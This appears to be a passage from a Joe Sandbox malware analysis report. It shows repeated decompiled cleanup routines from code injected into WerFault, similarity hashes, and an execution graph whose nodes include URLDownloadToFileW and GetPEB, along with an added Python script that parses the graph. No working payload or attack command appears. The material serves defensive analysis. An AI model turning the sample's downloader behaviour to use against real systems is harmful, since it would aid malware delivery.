                        • Opcode Fuzzy Hash: 0bc737f0b483573194721a43e2679675241b0b28bc17263651f515b218c26e1c
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881C20(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 3dbadbd02b5dc21bb9f75983b927afc0a22f1f5445523dba9b348c04d69320e1
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 3dbadbd02b5dc21bb9f75983b927afc0a22f1f5445523dba9b348c04d69320e1
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881C39(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 7b4490cab8e7df1a80e75c376ef36dd5c93efc42b05a53f79c779dc1ae71b47c
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 7b4490cab8e7df1a80e75c376ef36dd5c93efc42b05a53f79c779dc1ae71b47c
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881C5E(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 510deb21a893fdb4b9c245bba78a4cd162b7d80ba90573a82f9db385f46e0c98
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 510deb21a893fdb4b9c245bba78a4cd162b7d80ba90573a82f9db385f46e0c98
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881DE5(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 47efcf5e3aa22e9f05e600b6aa2de3c6c34fd0fd8a6ee3991f7257d9d952fdb3
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 47efcf5e3aa22e9f05e600b6aa2de3c6c34fd0fd8a6ee3991f7257d9d952fdb3
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881D18(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				// _t22 is the caller's frame pointer: every operand below (-0x10, -0x1c, -0x70, -0x80, -0x2a4)
                        				// is a local of the calling function, so this is a shared cleanup tail reached from several
                        				// entry points rather than a self-contained routine
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed; 0x8000 == MEM_RELEASE (dwSize must be 0 for a release)
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c))); // call through a runtime-resolved import slot the sandbox did not name
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4))); // same slot, second buffer, skipped when the -0x80 flag is set
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9; // every path returns -7, consistent with an error exit
                        				return _t13;
                        			}





                        Instruction addresses for the statements above: 0x028821ac to 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: f93ec54997cc57fb8d0b805183813b92214eae9f688c3d4298621f1d326365d1
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: f93ec54997cc57fb8d0b805183813b92214eae9f688c3d4298621f1d326365d1
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881D43(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				// Identical to the E02881D18 listing above: same instruction addresses (0x028821ac to 0x02882206),
                        				// listed once per entry point into the shared cleanup tail
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}





                        Instruction addresses for the statements above: 0x028821ac to 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: a635acd69f0d7ef709cb39edba54375991e2ebdd5839360059197b1bb84cbb45
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: a635acd69f0d7ef709cb39edba54375991e2ebdd5839360059197b1bb84cbb45
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881D60(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				// Identical to the E02881D18 listing above: same instruction addresses (0x028821ac to 0x02882206),
                        				// listed once per entry point into the shared cleanup tail
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}





                        Instruction addresses for the statements above: 0x028821ac to 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: ab4e0dad5a05e714c35a9c0c2cd98aee7fb4307c8e57754e49ac5a4dc3f293ea
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: ab4e0dad5a05e714c35a9c0c2cd98aee7fb4307c8e57754e49ac5a4dc3f293ea
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E0286D4B9() {
                        
                        				E0286D39F(); // executed
                        				 *0x289f8b4(0x28a0028); // unnamed import slot called on the global object at 0x28a0028
                        				Sleep(0x64); // executed; 0x64 == 100 ms
                        				return  *0x289f8b8(0x28a0028); // the neighbouring slot on the same object: an acquire/release pair by shape, not resolved by the sandbox
                        			}



                        Instruction addresses for the statements above: 0x0286d4ba to 0x0286d4db

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 765f9c11144aaa194d1375639ffda62bc3508a1eddfb7d6fcf9b865517f40e4e
                        • Instruction ID: f5030965b8893455e88d41518f9415b8bf6f496fb8c695cc26985ab117f66885
                        • Opcode Fuzzy Hash: 765f9c11144aaa194d1375639ffda62bc3508a1eddfb7d6fcf9b865517f40e4e
                        • Instruction Fuzzy Hash: 65C04C3FD82924ABE2893B64790DACE3755DF6931371D0840F302E54C0DB6405674BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54d00fea4448cc42d320c75b2a5d2e96c1e7650121fee7c727e9467fa818c0ee
                        • Instruction ID: f44afcc15e126b402a878c1726f30ab4447eb93aac78bbb6592f5c4fea646484
                        • Opcode Fuzzy Hash: 54d00fea4448cc42d320c75b2a5d2e96c1e7650121fee7c727e9467fa818c0ee
                        • Instruction Fuzzy Hash: BFB17C7CE4120CEFEB08CBA4D80DBBDBBB5EF58306F188855E606E6580D7749A60DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6cba7a69d2aa192c76fa297e91b9f150034e19ebb5f812881ae214746f9b301
                        • Instruction ID: 3d6c0c24acbf35907d8bfd5c031547c25f5c193fe5dc8421ce3c15f3bbfc21fb
                        • Opcode Fuzzy Hash: c6cba7a69d2aa192c76fa297e91b9f150034e19ebb5f812881ae214746f9b301
                        • Instruction Fuzzy Hash: B881707CE41208EFEB089BA0DC0DBBDBBB5EF98306F188855E606E65C4D7745A60DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:8.4%
                        Dynamic/Decrypted Code Coverage:2.7%
                        Signature Coverage:0%
                        Total number of Nodes:37
                        Total number of Limit Nodes:2
                        execution_graph (37 nodes, 40 edges; the report's graph data, flattened by extraction and listed here as nodes and adjacency)
                        Nodes with API labels (id address API):
                        • 25422 3ae0f5a LdrInitializeThunk (no edges)
                        • 25444 3a85150 GetPEB
                        • 25449 3a851a9 GetPEB
                        • 25465 3a65215 GetPEB
                        • 25469 3a84004 URLDownloadToFileW (no edges)
                        • 25470 3a84876 GetPEB GetPEB (no edges)
                        Other nodes (id address):
                        • 25423 3a8489c, 25425 3a848c6, 25426 3a848d5, 25427 3a848ec, 25431 3a848f7, 25432 3a661e9, 25433 3a661f8, 25435 3a66200, 25436 3a84963, 25438 3a8496d
                        • 25439 3a849ee, 25440 3a66202, 25441 3a6622b, 25443 3a6625d, 25445 3a6626c, 25446 3a85150, 25447 3a8515d, 25448 3a85161, 25450 3a851c3, 25451 3a6e06b
                        • 25452 3a6e099, 25454 3a6e0a9, 25455 3a6db20, 25456 3a6db36, 25458 3a6db41, 25459 3a6e6a4, 25460 3a6e6b8, 25462 3a6e720, 25463 3a651f6, 25464 3a651fe
                        • 25466 3a6522e
                        Edges (source -> targets):
                        • 25423 -> 25426
                        • 25426 -> 25427
                        • 25427 -> 25431, 25432
                        • 25431 -> 25425
                        • 25432 -> 25433
                        • 25433 -> 25440
                        • 25435 -> 25431, 25436
                        • 25436 -> 25438
                        • 25438 -> 25451
                        • 25439 -> 25431
                        • 25440 -> 25441
                        • 25441 -> 25446
                        • 25443 -> 25444
                        • 25444 -> 25445
                        • 25445 -> 25435
                        • 25446 -> 25447, 25448
                        • 25447 -> 25443
                        • 25448 -> 25449, 25450
                        • 25449 -> 25450
                        • 25450 -> 25443
                        • 25451 -> 25452
                        • 25452 -> 25455
                        • 25454 -> 25439
                        • 25455 -> 25456
                        • 25456 -> 25459
                        • 25458 -> 25454
                        • 25459 -> 25460
                        • 25460 -> 25462, 25463
                        • 25462 -> 25458
                        • 25463 -> 25464, 25466
                        • 25464 -> 25465, 25466
                        • 25465 -> 25466
                        • 25466 -> 25462
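The execution_graph line above is the report's node and edge data run together by extraction. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses that line back into a graph and answers the two questions an analyst wants from it, which nodes carry API labels and which of those are reachable from the graph's entry nodes. The input string is the execution_graph line copied from this page; the token grammar it assumes (node id, hex address, optional API names; edges as id->id) is read off that one line and is an assumption about the report format in general.

```python
"""Parse the flattened execution_graph line of a Joe Sandbox report.

Added example; not code from the sample or from the Joe Sandbox report.
Assumed grammar (read off the line below): a node is '<id> <hex address>'
followed by zero or more API-name tokens; an edge is '<src>-><dst>'.
EXECUTION_GRAPH is the line copied from this report (process 5, region
03AE0000), not constructed data.
"""
import re
from collections import defaultdict

EXECUTION_GRAPH = (
    "execution_graph 25422 3ae0f5a LdrInitializeThunk 25423 3a8489c 25426 3a848d5 "
    "25423->25426 25425 3a848c6 25427 3a848ec 25426->25427 25431 3a848f7 25427->25431 "
    "25432 3a661e9 25427->25432 25431->25425 25433 3a661f8 25432->25433 25440 3a66202 "
    "25433->25440 25435 3a66200 25435->25431 25436 3a84963 25435->25436 25438 3a8496d "
    "25436->25438 25451 3a6e06b 25438->25451 25439 3a849ee 25439->25431 25441 3a6622b "
    "25440->25441 25446 3a85150 25441->25446 25443 3a6625d 25444 3a85150 GetPEB "
    "25443->25444 25445 3a6626c 25444->25445 25445->25435 25447 3a8515d 25446->25447 "
    "25448 3a85161 25446->25448 25447->25443 25449 3a851a9 GetPEB 25448->25449 "
    "25450 3a851c3 25448->25450 25449->25450 25450->25443 25452 3a6e099 25451->25452 "
    "25455 3a6db20 25452->25455 25454 3a6e0a9 25454->25439 25456 3a6db36 25455->25456 "
    "25459 3a6e6a4 25456->25459 25458 3a6db41 25458->25454 25460 3a6e6b8 25459->25460 "
    "25462 3a6e720 25460->25462 25463 3a651f6 25460->25463 25462->25458 25464 3a651fe "
    "25463->25464 25466 3a6522e 25463->25466 25465 3a65215 GetPEB 25464->25465 "
    "25464->25466 25465->25466 25466->25462 25469 3a84004 URLDownloadToFileW "
    "25470 3a84876 GetPEB GetPEB"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, [api labels])."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            current = None  # labels never follow an edge token
            i += 1
        elif NODE_ID_RE.match(tok):
            if i + 1 == len(tokens):
                raise ValueError("node id %s has no address" % tok)
            current = int(tok)
            nodes[current] = (tokens[i + 1], [])  # address always follows the id
            i += 2
        elif current is None:
            raise ValueError("label %r is not attached to a node" % tok)
        else:
            nodes[current][1].append(tok)  # API name recorded at this node
            i += 1
    for src, dst in edges:
        if src not in nodes or dst not in nodes:
            raise ValueError("edge %d->%d references an undefined node" % (src, dst))
    return nodes, edges


def api_nodes(nodes):
    """Subset of nodes carrying at least one API label."""
    return {nid: labels for nid, (_, labels) in nodes.items() if labels}


def roots(nodes, edges):
    """Nodes with no incoming edge, isolated nodes included."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)


def reachable_from(edges, start):
    """Node ids reachable from start by following edges (start included)."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(succ[n])
    return seen


def reachable_apis(nodes, edges, start):
    """Sorted, de-duplicated API labels on the nodes reachable from start."""
    hit = reachable_from(edges, start)
    return sorted({lbl for n in hit for lbl in nodes[n][1]})


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(EXECUTION_GRAPH)
    print("%d nodes, %d edges" % (len(nodes), len(edges)))
    for r in roots(nodes, edges):
        addr, labels = nodes[r]
        print("root %d @%s %s: reaches %d nodes, APIs: %s" % (
            r, addr, " ".join(labels), len(reachable_from(edges, r)),
            ", ".join(reachable_apis(nodes, edges, r)) or "none"))
```

Run stand-alone it prints each root of the graph with the API calls reachable from it. On this graph the traced chain starting at node 25423 reaches 34 nodes and three GetPEB sites, while the URLDownloadToFileW node 25469 and the LdrInitializeThunk node 25422 have no edges at all: their call sites were recorded but are not connected to the traced chain, which is worth knowing before reading the coverage figures above as a complete call trace.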
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b526b75a06f722ac38072758ac8086934243536fa66adb65538255f726036f97
                        • Instruction ID: 2508350d7d228aa9c09c903d05bde78944b93b85e539f99a1c54bdc4b1973750
                        • Opcode Fuzzy Hash: b526b75a06f722ac38072758ac8086934243536fa66adb65538255f726036f97
                        • Instruction Fuzzy Hash: 48B0927004A2825BC34163600829AA2AB142BA1210F6981AAD0C41A14A87584535D3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
